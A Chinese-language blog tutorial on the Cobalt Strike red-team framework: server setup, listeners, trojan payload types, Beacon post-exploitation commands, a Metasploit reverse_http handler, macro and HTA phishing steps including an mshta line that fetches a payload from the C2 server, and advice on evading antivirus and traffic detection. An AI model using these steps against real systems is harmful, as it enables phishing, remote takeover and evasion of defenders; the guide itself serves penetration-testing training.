Cobalt Strike(CS)内网渗透工具核心重点知识总结

一、工具基础认知

  1. 定位:美国红队专用商业渗透测试工具,多用于内网渗透、APT攻击,是红队核心武器,常联动Mimikatz等工具。

  2. 架构单服务端+多客户端,支持多人团队分布式协同操作。

  3. 核心能力:多协议主机上线、权限提升、凭据窃取、端口转发/SOCKS代理、Office钓鱼、木马捆绑、文件管理、屏幕监控、内网扫描等。

  4. 官网https://www.cobaltstrike.com

  5. 核心流量控制:依靠Malleable C2 Profile自定义流量特征,规避安全设备检测;默认服务端口50050,已被安全设备拉黑,实战必须修改端口。

二、CS环境搭建(Linux服务端+Windows客户端)

1. 服务端启动步骤(Kali Linux)

复制代码
# 1. 进入服务端目录
cd root/CS4.8/server
# 2. 赋予运行权限
chmod +x teamserver
chmod +x TeamServerImage
# 3. 启动服务端(格式:./teamserver 本机IP 密码 c2配置文件)
./teamserver IP 密码 profile.c2

2. Windows客户端连接

  1. 运行Cobalt_Strike_CN.bat打开客户端;

  2. 填写服务端IP、修改后的端口、自定义用户名、服务端设置的密码完成连接;

  3. 多团队协作通信:

    • 公屏聊天:直接输入消息;

    • 私聊:/msg 用户名 消息内容

三、木马生成完整流程(核心操作)

整体流程:新建监听器 → 选择载荷类型生成木马 → 保存木马 → 目标运行后CS上线

1. 监听器两种核心模式

  • reverse_http(反向连接):目标主动连接服务端,实战最常用;

  • beacon_bind(正向连接):主动去连接目标,内网隔离场景使用。

2. 主流木马载荷类型

载荷类型 用途
Office宏 Word/Excel/PPT钓鱼,邮件攻击主流
HTA文档 html应用程序,通过mshta命令远程加载执行
Windows可执行程序EXE 普通exe木马,分Staged(分段)/Stageless(无分段免杀更优)
Payload生成器 输出各类语言shellcode,供二次开发免杀

3. 上线逻辑

将生成的木马上传至目标主机执行,CS监听器捕获连接,目标主机出现在主机列表即上线成功。

四、Beacon核心后置渗透功能(目标上线后操作)

右键上线主机进入Beacon命令行,输入?查看全部可用指令

  1. 基础命令

    • sleep 数值:调整Beacon回连延时,sleep 0切换交互式实时连接;

    • shell 命令:执行系统命令(shell whoamishell ipconfigshell dir);

    • upload/download:远程上传、下载目标文件。

  2. 图形化管控

    • 远程VNC:无交互远程桌面控制目标;

    • 文件管理器:可视化浏览、增删改目标磁盘文件。

  1. 内网探测功能

    • 进程列表:查看所有进程,支持结束进程、伪造Token;

    • 网段扫描:支持ARP/ICMP扫描同网段存活主机、端口探测(ARP扫描防火墙难以拦截);

    • Net View:查询局域网共享主机,横向渗透前置信息收集。

五、插件加载扩展能力

  1. 插件格式:.cna后缀文件;

  2. 加载流程:CS左上角「Cobalt Strike」→「脚本管理器」→Load→选中.cna插件打开;

  3. 加载成功标识:脚本管理器状态栏出现对勾;

  4. 常用插件:Ladon、OLa、梼杌、谢公子等,拓展内网扫描、提权、凭证抓取功能。

六、CS联动MSF(弥补CS漏洞库短板)

操作步骤

  1. Kali启动MSF控制台:msfconsole

  2. CS新建监听器:Payload选择Foreign HTTP,填写Kali主机IP、自定义端口;

  1. MSF配置反向监听:
复制代码
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set Lhost Kali_IP
set Lport 监听端口
run
  1. CS右键上线主机 →「增加会话」,选中MSF监听,流量转发至MSF,获取Meterpreter会话。

七、主流钓鱼木马制作(实战攻击手段)

1. Office宏木马(邮件钓鱼首选)

  1. CS生成Office宏代码,复制剪贴板;

  2. Word/Excel/PPT:视图→查看宏→新建宏,清空默认代码,粘贴CS生成宏;

  3. 保存格式必须为启用宏文档.xlsm/.docm),普通xlsx/doc会禁用宏;

  4. 目标打开文档点击「启用内容」,CS自动上线。

2. HTA网页木马

  1. CS生成.hta文件;

  2. CS站点管理-文件托管,对外提供木马下载URL;

  3. 目标CMD执行命令上线:mshta http://服务端IP:端口/download/file.ext

八、安全&实战关键要点

  1. 流量规避:必须自定义teamserver端口、配置Malleable C2 Profile修改流量特征,默认配置极易被安全设备查杀;

  2. 免杀环节:原生EXE、宏文件极易被杀毒拦截,实战需做免杀处理;

  3. 法律风险:该工具仅可用于企业授权范围内的安全渗透测试,未经授权使用、传播木马属于违法犯罪;

  4. 横向渗透基础:ARP扫描、共享探测、端口转发、凭据抓取是内网横向移动核心前置操作;

  5. 工具互补:CS擅长主机持久化、团队协同;MSF漏洞库丰富,二者联动可覆盖全流程渗透。

相关推荐
网安老伯11 小时前
网络安全基础要点知识介绍(非常详细),零基础入门到精通,看这一篇就够了
运维·前端·网络协议·web安全·网络安全·职场和发展
北龙云海21 小时前
案例分享 | 面向公网业务系统境内访问白名单配置实操方案
运维·网络·安全·网络安全·告警·数据泄露·入侵攻击
Draina1 天前
CBC填充预言攻击-CBC Padding Oracle Crypto Attack
python·安全·web安全·网络安全·密码学·安全性测试
国际云,接待1 天前
Google Cloud Armor实战:给网站API加WAF、限速和日志验证
后端·网络安全·云计算·googlecloud
Demons_kirit2 天前
实验:文件路径遍历,简单情况(Lab: File path traversal, simple case)
网络安全
sbjdhjd2 天前
SQL 注入零基础详解:原理、手工注入流程与 Sqli-Labs 靶场实战1~5关和第9关思路
数据库·sql·计算机网络·web安全·网络安全·网络攻击模型·安全架构
学习溢出2 天前
【网络安全】Living off the Land 攻击 | 蓝队防守
安全·web安全·网络安全
学逆向的2 天前
汇编——寻址方式
开发语言·汇编·网络安全
上海云盾-高防顾问3 天前
SD-WAN 跨境加速,真实日常使用体验
网络·网络安全